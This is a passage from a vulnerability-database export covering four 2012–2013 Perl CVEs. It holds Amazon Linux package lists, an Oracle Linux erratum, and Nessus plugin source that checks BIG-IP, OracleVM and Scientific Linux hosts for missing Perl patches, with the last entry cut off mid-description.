perl-Module-CoreList-2.18-130.17.amzn1.i686 \n perl-Test-Simple-0.92-130.17.amzn1.i686 \n perl-debuginfo-5.10.1-130.17.amzn1.i686 \n perl-Locale-Maketext-Simple-0.18-130.17.amzn1.i686 \n perl-CPANPLUS-0.88-130.17.amzn1.i686 \n perl-Parse-CPAN-Meta-1.40-130.17.amzn1.i686 \n perl-IO-Zlib-1.09-130.17.amzn1.i686 \n perl-ExtUtils-Embed-1.28-130.17.amzn1.i686 \n perl-Digest-SHA-5.47-130.17.amzn1.i686 \n perl-Compress-Zlib-2.020-130.17.amzn1.i686 \n perl-Params-Check-0.26-130.17.amzn1.i686 \n perl-Time-HiRes-1.9721-130.17.amzn1.i686 \n perl-Module-Build-0.3500-130.17.amzn1.i686 \n perl-Time-Piece-1.15-130.17.amzn1.i686 \n perl-Log-Message-0.02-130.17.amzn1.i686 \n perl-Module-Pluggable-3.90-130.17.amzn1.i686 \n perl-CPAN-1.9402-130.17.amzn1.i686 \n perl-ExtUtils-ParseXS-2.2003.0-130.17.amzn1.i686 \n perl-Log-Message-Simple-0.04-130.17.amzn1.i686 \n perl-Pod-Simple-3.13-130.17.amzn1.i686 \n perl-ExtUtils-MakeMaker-6.55-130.17.amzn1.i686 \n perl-Module-Load-Conditional-0.30-130.17.amzn1.i686 \n perl-IO-Compress-Zlib-2.020-130.17.amzn1.i686 \n perl-parent-0.221-130.17.amzn1.i686 \n perl-File-Fetch-0.26-130.17.amzn1.i686 \n \n src: \n perl-5.10.1-130.17.amzn1.src \n \n x86_64: \n perl-Compress-Raw-Zlib-2.023-130.17.amzn1.x86_64 \n perl-Archive-Tar-1.58-130.17.amzn1.x86_64 \n perl-CGI-3.51-130.17.amzn1.x86_64 \n perl-devel-5.10.1-130.17.amzn1.x86_64 \n perl-ExtUtils-Embed-1.28-130.17.amzn1.x86_64 \n perl-CPAN-1.9402-130.17.amzn1.x86_64 \n perl-Pod-Escapes-1.04-130.17.amzn1.x86_64 \n perl-parent-0.221-130.17.amzn1.x86_64 \n perl-Module-Loaded-0.02-130.17.amzn1.x86_64 \n perl-Module-Pluggable-3.90-130.17.amzn1.x86_64 \n perl-Module-CoreList-2.18-130.17.amzn1.x86_64 \n perl-Archive-Extract-0.38-130.17.amzn1.x86_64 \n perl-IO-Zlib-1.09-130.17.amzn1.x86_64 \n perl-IO-Compress-Base-2.020-130.17.amzn1.x86_64 \n perl-Log-Message-Simple-0.04-130.17.amzn1.x86_64 \n perl-CPANPLUS-0.88-130.17.amzn1.x86_64 \n perl-Test-Simple-0.92-130.17.amzn1.x86_64 \n perl-suidperl-5.10.1-130.17.amzn1.x86_64 \n perl-debuginfo-5.10.1-130.17.amzn1.x86_64 \n perl-Params-Check-0.26-130.17.amzn1.x86_64 \n perl-Compress-Raw-Bzip2-2.020-130.17.amzn1.x86_64 \n perl-Term-UI-0.20-130.17.amzn1.x86_64 \n perl-ExtUtils-CBuilder-0.27-130.17.amzn1.x86_64 \n perl-Time-HiRes-1.9721-130.17.amzn1.x86_64 \n perl-Digest-SHA-5.47-130.17.amzn1.x86_64 \n perl-Object-Accessor-0.34-130.17.amzn1.x86_64 \n perl-Log-Message-0.02-130.17.amzn1.x86_64 \n perl-Time-Piece-1.15-130.17.amzn1.x86_64 \n perl-Module-Build-0.3500-130.17.amzn1.x86_64 \n perl-Compress-Zlib-2.020-130.17.amzn1.x86_64 \n perl-libs-5.10.1-130.17.amzn1.x86_64 \n perl-version-0.77-130.17.amzn1.x86_64 \n perl-Module-Load-Conditional-0.30-130.17.amzn1.x86_64 \n perl-IO-Compress-Zlib-2.020-130.17.amzn1.x86_64 \n perl-File-Fetch-0.26-130.17.amzn1.x86_64 \n perl-ExtUtils-ParseXS-2.2003.0-130.17.amzn1.x86_64 \n perl-Parse-CPAN-Meta-1.40-130.17.amzn1.x86_64 \n perl-Package-Constants-0.02-130.17.amzn1.x86_64 \n perl-IPC-Cmd-0.56-130.17.amzn1.x86_64 \n perl-core-5.10.1-130.17.amzn1.x86_64 \n perl-Module-Load-0.16-130.17.amzn1.x86_64 \n perl-Test-Harness-3.17-130.17.amzn1.x86_64 \n perl-ExtUtils-MakeMaker-6.55-130.17.amzn1.x86_64 \n perl-5.10.1-130.17.amzn1.x86_64 \n perl-IO-Compress-Bzip2-2.020-130.17.amzn1.x86_64 \n perl-Locale-Maketext-Simple-0.18-130.17.amzn1.x86_64 \n perl-Pod-Simple-3.13-130.17.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2013-04-04T11:10:00", "published": "2013-04-04T11:10:00", "id": "ALAS-2013-177", "href": "https://alas.aws.amazon.com/ALAS-2013-177.html", "title": "Medium: perl", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:33", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "[4:5.10.1-130]\n- Resolves: #915692 - CVE-2012-5526 (newline injection due to improper CRLF\n escaping in Set-Cookie and P3P headers)\n- Resolves: #915692 - CVE-2012-6329 (possible arbitrary code execution via\n Locale::Maketext)\n- Resolves: #915692 - CVE-2013-1667 (DoS in rehashing code)", "edition": 4, "modified": "2013-03-26T00:00:00", "published": "2013-03-26T00:00:00", "id": "ELSA-2013-0685", "href": "http://linux.oracle.com/errata/ELSA-2013-0685.html", "title": "perl security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-10-14T05:45:41", "description": "CVE-2012-5195 Heap-based buffer overflow in the Perl_repeatcpy\nfunction in util.c in Perl 5.12.x before 5.12.5, 5.14.x before 5.14.3,\nand 5.15.x before 15.15.5 allows context-dependent attackers to cause\na denial of service (memory consumption and crash) or possibly execute\narbitrary code via the 'x' string repeat operator.\n\nCVE-2012-5526 CGI.pm module before 3.63 for Perl does not properly\nescape newlines in (1) Set-Cookie or (2) P3P headers, which might\nallow remote attackers to inject arbitrary headers into responses from\napplications that use CGI.pm.\n\nCVE-2012-6329 The _compile function in Maketext.pm in the\nLocale::Maketext implementation in Perl before 5.17.7 does not\nproperly handle backslashes and fully qualified method names during\ncompilation of bracket notation, which allows context-dependent\nattackers to execute arbitrary commands via crafted input to an\napplication that accepts translation strings from users, as\ndemonstrated by the TWiki application before 5.1.3, and the Foswiki\napplication 1.0.x through 1.0.10 and 1.1.x through 1.1.6.\n\nCVE-2013-1667 The rehash mechanism in Perl 5.8.2 through 5.16.x allows\ncontext-dependent attackers to cause a denial of service (memory\nconsumption and crash) via a crafted hash key.", "edition": 27, "published": "2015-09-16T00:00:00", "title": "F5 Networks BIG-IP : Perl vulnerabilities (K15867)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "modified": "2015-09-16T00:00:00", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_BIGIP_SOL15867.NASL", "href": "https://www.tenable.com/plugins/nessus/85945", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K15867.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85945);\n script_version(\"2.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/13\");\n\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_bugtraq_id(56287, 56562, 56950, 58311);\n\n script_name(english:\"F5 Networks BIG-IP : Perl vulnerabilities (K15867)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"CVE-2012-5195 Heap-based buffer overflow in the Perl_repeatcpy\nfunction in util.c in Perl 5.12.x before 5.12.5, 5.14.x before 5.14.3,\nand 5.15.x before 15.15.5 allows context-dependent attackers to cause\na denial of service (memory consumption and crash) or possibly execute\narbitrary code via the 'x' string repeat operator.\n\nCVE-2012-5526 CGI.pm module before 3.63 for Perl does not properly\nescape newlines in (1) Set-Cookie or (2) P3P headers, which might\nallow remote attackers to inject arbitrary headers into responses from\napplications that use CGI.pm.\n\nCVE-2012-6329 The _compile function in Maketext.pm in the\nLocale::Maketext implementation in Perl before 5.17.7 does not\nproperly handle backslashes and fully qualified method names during\ncompilation of bracket notation, which allows context-dependent\nattackers to execute arbitrary commands via crafted input to an\napplication that accepts translation strings from users, as\ndemonstrated by the TWiki application before 5.1.3, and the Foswiki\napplication 1.0.x through 1.0.10 and 1.1.x through 1.1.6.\n\nCVE-2013-1667 The rehash mechanism in Perl 5.8.2 through 5.16.x allows\ncontext-dependent attackers to cause a denial of service (memory\nconsumption and crash) via a crafted hash key.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K15867\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K15867.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki 5.1.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K15867\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.3.0-11.6.1\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.0.0-12.1.2\",\"11.6.1HF1\",\"11.5.4HF4\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.4.0-11.6.1\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.0.0-12.1.2\",\"11.6.1HF1\",\"11.5.4HF4\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.0.0-12.1.2\",\"11.6.1HF1\",\"11.5.4HF4\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\",\"10.0.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.0.0-12.1.2\",\"11.6.1HF1\",\"11.5.4HF4\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.0.0-12.1.2\",\"11.6.1HF1\",\"11.5.4HF4\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\",\"10.0.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.1HF1\",\"11.5.4HF4\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\",\"10.0.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.0.0-12.1.2\",\"11.6.1HF1\",\"11.5.4HF4\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\",\"10.0.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.0.0-12.1.2\",\"11.6.1HF1\",\"11.5.4HF4\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.3.0-11.6.1\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.0.0-12.1.2\",\"11.6.1HF1\",\"11.5.4HF4\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T13:23:54", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Do not extend allowable epoch values in\n Time::Local::timelocal to remove useless warning on\n 64-bit platforms (Resolves: rhbz#1149375)\n\n - Fix perl segfaults with custom signal handle (Resolves:\n rhbz#991854)\n\n - Reorder AnyDBM_File back-end preference (Resolves:\n rhbz#1018721)\n\n - Fix backslash interpolation in Locale::Maketext\n (Resolves: rhbz#1029016)\n\n - Enable year 2038 for Time::Local on 64-bit platforms\n (Resolves: rhbz#1057047)\n\n - 800340 - strftime memory leak perl bug (RT#73520)\n\n - Resolves: rhbz#800340\n\n - Fix CVE-2012-5195 heap buffer overrun at repeatcpy\n (Resolves: rhbz#915691)\n\n - Fix CVE-2012-5526 newline injection due to improper CRLF\n escaping in Set-Cookie and P3P headers (Resolves:\n rhbz#915691)\n\n - Fix CVE-2012-6329 possible arbitrary code execution via\n Locale::Maketext (Resolves: rhbz#915691)\n\n - Fix CVE-2013-1667 DoS in rehashing code (Resolves:\n rhbz#915691)\n\n - 848156 - Reverts code of perl-5.8.8-U32019.patch\n\n - Resolves: rhbz#848156", "edition": 23, "published": "2016-06-22T00:00:00", "title": "OracleVM 3.2 : perl (OVMSA-2016-0076)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "modified": "2016-06-22T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.2", "p-cpe:/a:oracle:vm:perl"], "id": "ORACLEVM_OVMSA-2016-0076.NASL", "href": "https://www.tenable.com/plugins/nessus/91752", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0076.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91752);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_bugtraq_id(56287, 56562, 56950, 58311);\n\n script_name(english:\"OracleVM 3.2 : perl (OVMSA-2016-0076)\");\n script_summary(english:\"Checks the RPM output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote OracleVM host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Do not extend allowable epoch values in\n Time::Local::timelocal to remove useless warning on\n 64-bit platforms (Resolves: rhbz#1149375)\n\n - Fix perl segfaults with custom signal handle (Resolves:\n rhbz#991854)\n\n - Reorder AnyDBM_File back-end preference (Resolves:\n rhbz#1018721)\n\n - Fix backslash interpolation in Locale::Maketext\n (Resolves: rhbz#1029016)\n\n - Enable year 2038 for Time::Local on 64-bit platforms\n (Resolves: rhbz#1057047)\n\n - 800340 - strftime memory leak perl bug (RT#73520)\n\n - Resolves: rhbz#800340\n\n - Fix CVE-2012-5195 heap buffer overrun at repeatcpy\n (Resolves: rhbz#915691)\n\n - Fix CVE-2012-5526 newline injection due to improper CRLF\n escaping in Set-Cookie and P3P headers (Resolves:\n rhbz#915691)\n\n - Fix CVE-2012-6329 possible arbitrary code execution via\n Locale::Maketext (Resolves: rhbz#915691)\n\n - Fix CVE-2013-1667 DoS in rehashing code (Resolves:\n rhbz#915691)\n\n - 848156 - Reverts code of perl-5.8.8-U32019.patch\n\n - Resolves: rhbz#848156\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2016-June/000491.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected perl package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki 5.1.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.2\", reference:\"perl-5.8.8-43.el5_11\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T18:22:44", "description": "A heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat\noperator, an attacker could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption.\n(CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers,\na remote attacker could use this flaw to alter member items of the\ncookie or add new items. (CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize\nPerl applications, did not properly handle backslashes or\nfully-qualified method names. An attacker could possibly use this flaw\nto execute arbitrary Perl code with the privileges of a Perl\napplication that uses untrusted Locale::Maketext templates.\n(CVE-2012-6329)\n\nAll running Perl programs must be restarted for this update to take\neffect.", "edition": 17, "published": "2013-03-28T00:00:00", "title": "Scientific Linux Security Update : perl on SL5.x, SL6.x i386/x86_64 (20130326)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "modified": "2013-03-28T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:perl-Pod-Simple", "p-cpe:/a:fermilab:scientific_linux:perl-Module-Build", "p-cpe:/a:fermilab:scientific_linux:perl-Time-Piece", "p-cpe:/a:fermilab:scientific_linux:perl-suidperl", "p-cpe:/a:fermilab:scientific_linux:perl-Module-Pluggable", "p-cpe:/a:fermilab:scientific_linux:perl-Locale-Maketext-Simple", "p-cpe:/a:fermilab:scientific_linux:perl-Params-Check", "p-cpe:/a:fermilab:scientific_linux:perl-Archive-Extract", "p-cpe:/a:fermilab:scientific_linux:perl-Pod-Escapes", "p-cpe:/a:fermilab:scientific_linux:perl-Package-Constants", "p-cpe:/a:fermilab:scientific_linux:perl-Test-Simple", "p-cpe:/a:fermilab:scientific_linux:perl-Compress-Raw-Bzip2", "p-cpe:/a:fermilab:scientific_linux:perl-CGI", "p-cpe:/a:fermilab:scientific_linux:perl-File-Fetch", "p-cpe:/a:fermilab:scientific_linux:perl-Module-Load", "p-cpe:/a:fermilab:scientific_linux:perl-Module-Load-Conditional", "p-cpe:/a:fermilab:scientific_linux:perl-devel", "p-cpe:/a:fermilab:scientific_linux:perl-Log-Message-Simple", "p-cpe:/a:fermilab:scientific_linux:perl-IO-Compress-Bzip2", "p-cpe:/a:fermilab:scientific_linux:perl", "p-cpe:/a:fermilab:scientific_linux:perl-Digest-SHA", "p-cpe:/a:fermilab:scientific_linux:perl-Archive-Tar", "p-cpe:/a:fermilab:scientific_linux:perl-ExtUtils-Embed", "p-cpe:/a:fermilab:scientific_linux:perl-Compress-Zlib", "p-cpe:/a:fermilab:scientific_linux:perl-Module-CoreList", "p-cpe:/a:fermilab:scientific_linux:perl-CPAN", "p-cpe:/a:fermilab:scientific_linux:perl-Log-Message", "p-cpe:/a:fermilab:scientific_linux:perl-IO-Compress-Zlib", "p-cpe:/a:fermilab:scientific_linux:perl-Object-Accessor", "p-cpe:/a:fermilab:scientific_linux:perl-Time-HiRes", "p-cpe:/a:fermilab:scientific_linux:perl-CPANPLUS", "p-cpe:/a:fermilab:scientific_linux:perl-libs", "p-cpe:/a:fermilab:scientific_linux:perl-Compress-Raw-Zlib", "p-cpe:/a:fermilab:scientific_linux:perl-ExtUtils-MakeMaker", "p-cpe:/a:fermilab:scientific_linux:perl-IO-Zlib", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:perl-parent", "p-cpe:/a:fermilab:scientific_linux:perl-ExtUtils-CBuilder", "p-cpe:/a:fermilab:scientific_linux:perl-IPC-Cmd", "p-cpe:/a:fermilab:scientific_linux:perl-Parse-CPAN-Meta", "p-cpe:/a:fermilab:scientific_linux:perl-Test-Harness", "p-cpe:/a:fermilab:scientific_linux:perl-Module-Loaded", "p-cpe:/a:fermilab:scientific_linux:perl-IO-Compress-Base", "p-cpe:/a:fermilab:scientific_linux:perl-version", "p-cpe:/a:fermilab:scientific_linux:perl-Term-UI", "p-cpe:/a:fermilab:scientific_linux:perl-ExtUtils-ParseXS", "p-cpe:/a:fermilab:scientific_linux:perl-core", "p-cpe:/a:fermilab:scientific_linux:perl-debuginfo"], "id": "SL_20130326_PERL_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/65715", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65715);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n\n script_name(english:\"Scientific Linux Security Update : perl on SL5.x, SL6.x i386/x86_64 (20130326)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat\noperator, an attacker could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption.\n(CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers,\na remote attacker could use this flaw to alter member items of the\ncookie or add new items. 